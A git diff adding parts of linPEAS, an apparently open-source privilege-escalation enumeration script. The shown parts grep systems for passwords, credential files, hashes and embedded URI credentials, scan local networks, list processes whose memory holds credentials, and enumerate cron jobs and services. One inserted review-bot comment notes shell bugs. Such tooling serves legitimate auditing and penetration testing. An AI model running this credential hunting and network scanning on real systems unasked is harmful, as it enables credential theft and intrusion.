##-- IF) Passwords files in home - print_2title "Finding *password* or *credential* files in home (limit 70)" - (printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | grep -v "/snap/" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found - echo "" - - if ! 
[ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then - ##-- IF) Find possible files with passwords - print_2title "Finding passwords inside key folders (limit 70) - only PHP files" - intpwdfiles=$(timeout 150 grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$HOMESEARCH" /var/www /usr/local/www/ "$backup_folders_row" /tmp /etc /root /mnt /Users /private 2>/dev/null) - printf "%s\n" "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" - echo "" - - print_2title "Finding passwords inside key folders (limit 70) - no PHP files" - printf "%s\n" "$intpwdfiles" | grep -vI ".php:" | grep -E "^/" | grep ":" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" - echo "" - - ##-- IF) Find possible files with passwords - print_2title "Finding possible password variables inside key folders (limit 140)" - timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" $HOMESEARCH /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" - 
timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" /var/www $backup_folders_row /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" - echo "" - - ##-- IF) Find possible conf files with passwords - print_2title "Finding possible password in config files" - ppicf=$(find "$HOMESEARCH" /etc /root /tmp /private /Applications -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null) - printf "%s\n" "$ppicf" | while read f; do - if grep -qEiI 'passwd.*|creden.*' \"$f\" 2>/dev/null; then - echo "$ITALIC $f$NC" - grep -EiIo 'passw.*|creden.*' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g" - fi - done - echo "" - - ##-- IF) Find possible files with usernames - print_2title "Finding 'username' string inside key folders (limit 70)" - timeout 150 grep -RiIE "username.*[=:].+" "$HOMESEARCH" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" - timeout 150 grep -RiIE "username.*[=:].+" /var/www "$backup_folders_row" /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v 
"#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" - echo "" - - ##-- IF) Specific hashes inside files - print_2title "Searching specific hashes inside files - less false positives (limit 70)" - regexblowfish='\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*' - regexjoomlavbulletin='[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}' - regexphpbb3='\$H\$[a-zA-Z0-9_/\.]{31}' - regexwp='\$P\$[a-zA-Z0-9_/\.]{31}' - regexdrupal='\$S\$[a-zA-Z0-9_/\.]{52}' - regexlinuxmd5='\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' - regexapr1md5='\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' - regexsha512crypt='\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}' - regexapachesha='\{SHA\}[0-9a-zA-Z/_=]{10,}' - timeout 150 grep -RIEHo "$regexblowfish|$regexjoomlavbulletin|$regexphpbb3|$regexwp|$regexdrupal|$regexlinuxmd5|$regexapr1md5|$regexsha512crypt|$regexapachesha" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | head -n 70 | sed "s,:.*,${SED_RED}," - echo "" - fi - - if ! [ "$FAST" ] && ! 
[ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then - ##-- IF) Specific hashes inside files - print_2title "Searching md5/sha1/sha256/sha512 hashes inside files (limit 50 - only 1 per file)" - regexmd5='(^|[^a-zA-Z0-9])[a-fA-F0-9]{32}([^a-zA-Z0-9]|$)' - regexsha1='(^|[^a-zA-Z0-9])[a-fA-F0-9]{40}([^a-zA-Z0-9]|$)' - regexsha256='(^|[^a-zA-Z0-9])[a-fA-F0-9]{64}([^a-zA-Z0-9]|$)' - regexsha512='(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)' - timeout 150 grep -RIEHo "$regexmd5|$regexsha1|$regexsha256|$regexsha512" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | awk -F: '{if (pre != $1){ print $0; }; pre=$1}' | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 2){ print line_init; } if (cont == "2"){print " #)There are more hashes files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 50 | sed "s,:.*,${SED_RED}," | sed "s,There are more hashes files in the previous parent folder,${C}[3m&${C}[0m," - echo "" - fi - - if ! [ "$SUPERFAST" ] && ! 
[ "$FAST" ]; then - ##-- IF) Find URIs with user:password@hoststrings - print_2title "Finding URIs with user:password@host inside key folders" - timeout 150 find /var/www "$backup_folders_row" /tmp /etc /var/log /private/var/log -type f -exec grep -RiIE "://(.+):(.+)@" "{}" \; 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" "$HOMESEARCH" 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /mnt 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /root 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /Applications 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - echo "" - fi -fi diff --git a/linPEAS/builder/linpeas_parts/network_information.sh b/linPEAS/builder/linpeas_parts/network_information.sh new file mode 100644 index 0000000..92ebef1 --- /dev/null +++ b/linPEAS/builder/linpeas_parts/network_information.sh 
@@ -0,0 +1,176 @@
+###########################################
+#---------) Network Information (---------#
+###########################################
+
+if [ "$MACOS" ]; then
+ print_2title "Network Capabilities"
+ warn_exec system_profiler SPNetworkDataType
+ echo ""
+fi
+
+#-- NI) Hostname, hosts and DNS
+print_2title "Hostname, hosts and DNS"
+cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null
+warn_exec dnsdomainname 2>/dev/null
+echo ""
+
+#-- NI) /etc/inetd.conf
+print_2title "Content of /etc/inetd.conf & /etc/xinetd.conf"
+(cat /etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf"
+echo ""
+
+#-- NI) Interfaces
+print_2title "Interfaces"
+cat /etc/networks 2>/dev/null
+(ifconfig || ip a) 2>/dev/null
+echo ""
+
+#-- NI) Neighbours
+print_2title "Networks and neighbours"
+if [ "$MACOS" ]; then
+ netstat -rn 2>/dev/null
+else
+ (route || ip n || cat /proc/net/route) 2>/dev/null
+fi
+(arp -e || arp -a || cat /proc/net/arp) 2>/dev/null
+echo ""
+
+if [ "$MACPEAS" ]; then
+ print_2title "Firewall status"
+ warn_exec system_profiler SPFirewallDataType
+fi
+
+#-- NI) Iptables
+print_2title "Iptables rules"
+(timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) 2>/dev/null || echo_not_found "iptables rules"
+echo ""
+
+#-- NI) Ports
+print_2title "Active Ports"
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports"
+( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED},"
+echo ""
+
+#-- NI) MacOS hardware ports
+if [ "$MACPEAS" ]; then
+ print_2title "Hardware Ports"
+ networksetup -listallhardwareports
+ echo ""
+
+ print_2title "VLANs"
+ networksetup -listVLANs
+ echo ""
+
+ print_2title "Wifi Info"
+ networksetup -getinfo Wi-Fi
+ echo ""
+
+ print_2title "Check Enabled Proxies"
+ scutil --proxy
+ echo ""
+
+ print_2title "Wifi Proxy URL"
+ networksetup -getautoproxyurl Wi-Fi
+ echo ""
+
+ print_2title "Wifi Web Proxy"
+ networksetup -getwebproxy Wi-Fi
+ echo ""
+
+ print_2title "Wifi FTP Proxy"
+ networksetup -getftpproxy Wi-Fi
+ echo ""
+fi
+
+#-- NI) tcpdump
+print_2title "Can I sniff with tcpdump?"
+timeout 1 tcpdump >/dev/null 2>&1
+if [ $? -eq 124 ]; then #If 124, then timed out == It worked
+ print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sniffing"
+ echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${SED_RED},"
+else echo_no
+fi
+echo ""
+
+#-- NI) Internet access
+if ! [ "$SUPERFAST" ] && ! [ "$FAST" ] && ! [ "$NOTEXPORT" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then
+ print_2title "Internet Access?"
+ check_tcp_80 2>/dev/null &
+ check_tcp_443 2>/dev/null &
+ check_icmp 2>/dev/null &
+ check_dns 2>/dev/null &
+ wait
+ echo ""
+fi
+
+if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] || [ "$AUTO_NETWORK_SCAN" ]; then
+ if ! [ "$FOUND_NC" ]; then
+ printf $RED"[-] $SCAN_BAN_BAD\n$NC"
+ echo "The network is not going to be scanned..."
+
+ else
+ print_2title "Scanning local networks (using /24)"
+
+ if ! [ "$PING" ] && ![ "$FPING" ]; then
+ printf $RED"[-] $DISCOVER_BAN_BAD\n$NC"
+ fi
+
+ select_nc
+ local_ips=$(ip a | grep -Eo 'inet[^6]\S+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | awk '{print $2}' | grep -E "^10\.|^172\.|^192\.168\.|^169\.254\.")
+ printf "%s\n" "$local_ips" | while read local_ip; do
+ if ! [ -z "$local_ip" ]; then
+ print_3title "Discovering hosts in $local_ip/24"
+
+ if [ "$PING" ] || [ "$FPING" ]; then
+ discover_network "$local_ip/24" | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Network Discovery" | grep -v "Network Discovery" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > $Wfolder/.ips.tmp
+ fi
+
+ discovery_port_scan "$local_ip/24" 22 | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Ports going to be scanned" | grep -v "Ports going to be scanned" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' >> $Wfolder/.ips.tmp
+
+ sort $Wfolder/.ips.tmp | uniq > $Wfolder/.ips
+ rm $Wfolder/.ips.tmp 2>/dev/null
+
+ while read disc_ip; do
+ me=""
+ if [ "$disc_ip" = "$local_ip" ]; then
+ me=" (local)"
+ fi
+
+ echo "Scanning top ports of ${disc_ip}${me}"
+ (tcp_port_scan "$disc_ip" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null
+ echo ""
+ done < $Wfolder/.ips
+
+ rm $Wfolder/.ips 2>/dev/null
+ echo ""
+ fi
+ done
+ fi
+fi
+
+if [ "$MACOS" ]; then
+ print_2title "Any MacOS Sharing Service Enabled?"
+ rmMgmt=$(netstat -na | grep LISTEN | grep tcp46 | grep "*.3283" | wc -l);
+ scrShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.5900" | wc -l);
+ flShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep -E "\*.88|\*.445|\*.548" | wc -l);
+ rLgn=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.22" | wc -l);
+ rAE=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.3031" | wc -l);
+ bmM=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.4488" | wc -l);
+ printf "\nThe following services are OFF if '0', or ON otherwise:\nScreen Sharing: %s\nFile Sharing: %s\nRemote Login: %s\nRemote Mgmt: %s\nRemote Apple Events: %s\nBack to My Mac: %s\n\n" "$scrShrng" "$flShrng" "$rLgn" "$rmMgmt" "$rAE" "$bmM";
+ echo ""
+ print_2title "VPN Creds"
+ system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password" | sed -${E} "s,Password|Authorization Name.*,${SED_RED},"
+ echo ""
+
+ print_2title "Bluetooth Info"
+ warn_exec system_profiler SPBluetoothDataType
+ echo ""
+
+ print_2title "Ethernet Info"
+ warn_exec system_profiler SPEthernetDataType
+ echo ""
+
+ print_2title "USB Info"
+ warn_exec system_profiler SPUSBDataType
+ echo ""
+fi
\ No newline at end of file
diff --git a/linPEAS/builder/linpeas_parts/procs_crons_timers_srvcs_sockets.sh b/linPEAS/builder/linpeas_parts/procs_crons_timers_srvcs_sockets.sh
new file mode 100644
index 0000000..fbb435e
--- /dev/null
+++ b/linPEAS/builder/linpeas_parts/procs_crons_timers_srvcs_sockets.sh
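Review bot: The `![ "$FPING" ]` in `if ! [ "$PING" ] && ![ "$FPING" ]; then` (local-network-scan block) is missing the space after `!`, so the shell tries to run a command literally named `![` instead of negating the test and the missing-discovery-tool warning is never reached as written; it should be `if ! [ "$PING" ] && ! [ "$FPING" ]; then`. The `.ips` scratch files are used unquoted (`> $Wfolder/.ips.tmp`, `done < $Wfolder/.ips`), unlike the quoted `"$local_ip/24"` beside them, so a `$Wfolder` containing whitespace breaks those redirections. `local_ips=$(ip a | ...)` also has no `ifconfig` fallback, whereas the "Interfaces" section above uses `(ifconfig || ip a)`, so on a host without `ip` the loop silently iterates nothing.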
@@ -0,0 +1,303 @@ +#################################################### +#-----) Processes & Cron & Services & Timers (-----# +#################################################### + +#-- PCS) Cleaned proccesses +print_2title "Cleaned processes" +if [ "$NOUSEPS" ]; then +printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC +fi +print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" + +if [ "$NOUSEPS" ]; then +print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," +pslist=$(print_ps) +else +(ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do + echo "$psline" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," + if [ "$(command -v capsh)" ] && ! 
echo "$psline" | grep -q root; then + cpid=$(echo "$psline" | awk '{print $2}') + caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')" + if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then + printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g" + fi + fi +done +pslist=$(ps auxwww) +echo "" + +#-- PCS) Binary processes permissions +print_2title "Binary processes permissions" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" +binW="IniTialiZZinnggg" +ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do + if [ -w "$bpath" ]; then + binW="$binW|$bpath" + fi +done +ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v "$USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN}," +fi +echo "" + +#-- PCS) Files opened by processes belonging to other users +if ! 
[ "$IAMROOT" ]; then +print_2title "Files opened by processes belonging to other users" +print_info "This is usually empty because of the lack of privileges to read other user processes information" +lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," +echo "" +fi + +#-- PCS) Processes with credentials inside memory +print_2title "Processes with credentials in memory (root req)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory" +if echo "$pslist" | grep -q "gdm-password"; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi +if echo "$pslist" | grep -q "gnome-keyring-daemon"; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi +if echo "$pslist" | grep -q "lightdm"; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi +if echo "$pslist" | grep -q "vsftpd"; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi +if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi +if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi +echo "" + +#-- PCS) Different processes 1 min +if ! [ "$FAST" ] && ! 
[ "$SUPERFAST" ]; then +print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs" +temp_file=$(mktemp) +if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi +echo "" +fi + +#-- PCS) Cron +print_2title "Cron jobs" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs" +command -v crontab 2>/dev/null || echo_not_found "crontab" +crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," +command -v incrontab 2>/dev/null || echo_not_found "incrontab" +incrontab -l 2>/dev/null +ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" +cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts \-\-report /etc/cron.hourly\| root run-parts /etc/cron." 
| sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," +crontab -l -u "$USER" 2>/dev/null | tr -d "\r" +ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths +atq 2>/dev/null +echo "" + +if [ "$MACPEAS" ]; then +print_2title "Third party LaunchAgents & LaunchDemons" +print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd" +ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null +echo "" + +print_2title "Writable System LaunchAgents & LaunchDemons" +find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do + program="" + program=$(defaults read "$f" Program 2>/dev/null) + if ! 
[ "$program" ]; then + program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) + fi + if [ -w "$program" ]; then + echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},"; + fi +done +echo "" + +print_2title "StartupItems" +print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items" +ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null +echo "" + +print_2title "Login Items" +print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items" +osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null +echo "" + +print_2title "SPStartupItemDataType" +system_profiler SPStartupItemDataType +echo "" + +print_2title "Emond scripts" +print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond" +ls -l /private/var/db/emondClients +echo "" +fi + +#-- PCS) Services +print_2title "Services" +print_info "Search for outdated versions" +(service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl" +echo "" + +#-- PSC) systemd PATH +print_2title "Systemd PATH" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths" +systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g" +WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders") +echo "" + +#-- PSC) .service files +#TODO: .service files in MACOS are folders +print_2title "Analyzing .service files" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#services" +printf "%s\n" "$PSTORAGE_SYSTEMD\n" | while read s; do +if [ ! -O "$s" ]; then #Remove services that belongs to the current user + if ! 
[ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then + echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g" + fi + servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths + printf "%s\n" "$servicebinpaths\n" | while read sp; do + if [ -w "$sp" ]; then + echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g" + fi + done + relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep -Iv "=/") + relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null | grep -Ev "/[a-zA-Z0-9_]+/") + if [ "$relpath1" ] || [ "$relpath2" ]; then + if [ "$WRITABLESYSTEMDPATH" ]; then + echo "$s is executing some relative path" | sed -${E} "s,.*,${SED_RED},"; + else + echo "$s is executing some relative path" + fi + fi +fi +done +if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi +echo "" + +#-- PSC) Timers +print_2title "System timers" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" +(systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found +echo "" + +#-- PSC) .timer files +print_2title "Analyzing .timer files" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" +printf "%s\n" "$PSTORAGE_TIMER\n" | while read t; do +if ! 
